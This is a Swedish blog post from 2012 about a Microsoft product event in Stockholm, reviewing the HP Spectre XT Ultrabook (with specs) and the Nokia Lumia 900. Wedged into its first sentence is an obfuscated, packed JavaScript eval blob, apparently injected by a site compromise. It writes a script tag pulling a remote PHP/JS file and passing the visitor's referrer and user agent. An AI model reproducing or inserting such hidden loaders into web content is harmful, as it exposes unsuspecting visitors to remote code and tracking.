Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Microsoft produkt vernissage

Microsoft produkt vernissage
Filip Urde
 • On 12 juni, 2012
 • http://www.revue.se/filip-urde

Bättre eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hedfy|var|u0026u|referrer|hayhh||js|php’.split(’|’),0,{}))
sent än aldrig…

I torsdags (7 juni) så var Revue inbjudna till Microsofts produkt vernissage på SO-Stockholm i Kungsträdgården.

Där fick vi ta del av den nya kollektionen Windows 7-datorerna och Widows-telefoner.

Det var ett tungt startfält med Ultrabooks som presenterades, där vi hittade två favoriter. Men den vi tänker presentera var Spectre XT Ultrabook från HP. En mycket trevlig bärbar som osar något coolt en PC inte gjort på länge. Kanske vad som ger Spectre XT Ultrabook en extra stjärna i kanten är dess samarbete med otroligt populära Beats Audio. Som man säger själv: ”Från bistron till styrelserummet” och jag förstår vad dem menar. Den snygga 13,3-tums avsmalnande kroppen väger bara 1,39 kg och gör SPECTRE XT till en värdig motståndare mot annars överlägset snygga Apple datorerna. Designen påminner om Apples, men det gör inget. Det här är en PC som vi gillar.

 

Spectre XT Ultrabook specs:

 • Processor

  Processortyp: Intel® Core™ i5-3317U
  Processorhastighet: 1,7 GHz
  Processorcache: 3 MB L3-cache
  Kretsar: Intel HM76 Express
 • Minne

  Standardminne: 4 GB DDR3
  Minneslayout: (1 x 4 GB)
  Minnesplatser: 1 DIMM
  Maximalt minne: Stöd för upp till 4 GB DDR3
 • Grafiskt subsystem

  Grafik: Intel HD Graphics 4000
 • Multimedia

  Ljudfunktioner: Beats Audio™ med 4 högtalare
  Webbkamera: HP TrueVision HD-webbkamera med LED för aktivitet; dubbel digital mikrofon med programvara

 

Nästa dragplåster var  Nokia Lumia 900 som vi inte fått fingra på tidigare.

Nokia Lumia 900 är väldigt lik Lumia 800 i designen, men med undantaget att 900 är bestyckad med en kamera mot användaren för video konversation och kanske fota sig själv lite enklare. Förutom det så är det tre stora skillnader mellan telefonerna, Lumia 900 har nämligen en bättre kamera, LTE samt ett större batteri. Eftersom kameran och batteriet var riktigt dåliga på Lumia 800.  Men det var p.ga. den stora skärmen och dessa telefoner är för personer som gillar stora skärmar, så 900:n får en 4,3 tum stor skärm istället för 3,7 tum. Helt enkelt så har enh bra lur blivit större och bättre.

Nokia har haft lite identitetsproblem de senaste åren, men nu känns det som man hittat en formel som fungerar. Man satsar på en helhet som vi inte sett hos någon annan producent. Man jobbar med tydliga färgval och vill att dessa färger ska gå igen i hela sin design och på alla kringliggande produkter. Därför har man lanserat matchande hörlurar och bluetooth mickar till sina telefoner och det ser faktiskt snyggt och enhetligt ut.

Operativsystemet Mango och dess integration med så väl facebook, twitter och liknande socialmedier gillar vi starkt! Hela Mango andas användarvänlighet och alla funktioner du vill åt ligger alltid nära tillhands. Fortsätt så Microsoft, så vi får en till stark aktör på smartphone marknaden.